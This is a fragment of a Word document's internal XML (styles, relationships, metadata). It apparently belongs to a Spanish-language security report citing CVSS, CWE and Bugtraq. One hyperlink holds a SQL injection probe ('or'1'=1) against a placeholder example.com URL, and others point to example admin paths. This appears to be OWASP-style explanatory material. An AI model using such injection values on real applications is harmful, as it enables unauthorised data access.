    <w:rsid w:val="00E133A4"/>
    <w:rsid w:val="00E26404"/>
    <w:rsid w:val="00E27BB6"/>
    <w:rsid w:val="00E710E3"/>
    <w:rsid w:val="00E75C56"/>
    <w:rsid w:val="00EB097A"/>
    <w:rsid w:val="00EB3221"/>
    <w:rsid w:val="00EC3730"/>
    <w:rsid w:val="00EC637A"/>
    <w:rsid w:val="00ED3325"/>
    <w:rsid w:val="00F13BEB"/>
    <w:rsid w:val="00F2352E"/>
    <w:rsid w:val="00F6015B"/>
    <w:rsid w:val="00F842F7"/>
    <w:rsid w:val="00F87722"/>
    <w:rsid w:val="00FD664C"/>
    <w:rsid w:val="00FE5CA7"/>
    <w:rsid w:val="00FF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CABF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3740F264-8C41-4B80-B8FF-7677ED0D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B5A"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E26404"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Tablaconcuadrcula">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00DE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25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org/cvss"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we.mitre.org" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/app/accountView?id=&#8217;or&#8217;1&#8217;=1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ejemplo.com/app/admin_getappInf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ve.mitre.org/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://honeynet.org" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ejemplo.com/app/getappInfo" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://seclists.org/bugtraq"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nvd.nist.gov/vuln-metrics/cvss/v3-calculator"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26F04-704B-4F0E-B27F-0D7DB230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5959</TotalTime>
  <Pages>1</Pages>
  <Words>4075</Words>
  <Characters>22416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ANTUNEZ PABLO GERMAN</cp:lastModifiedBy>
  <cp:revision>33</cp:revision>
  <cp:lastPrinted>2023-07-09T22:29:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-13T12:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-26T21:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>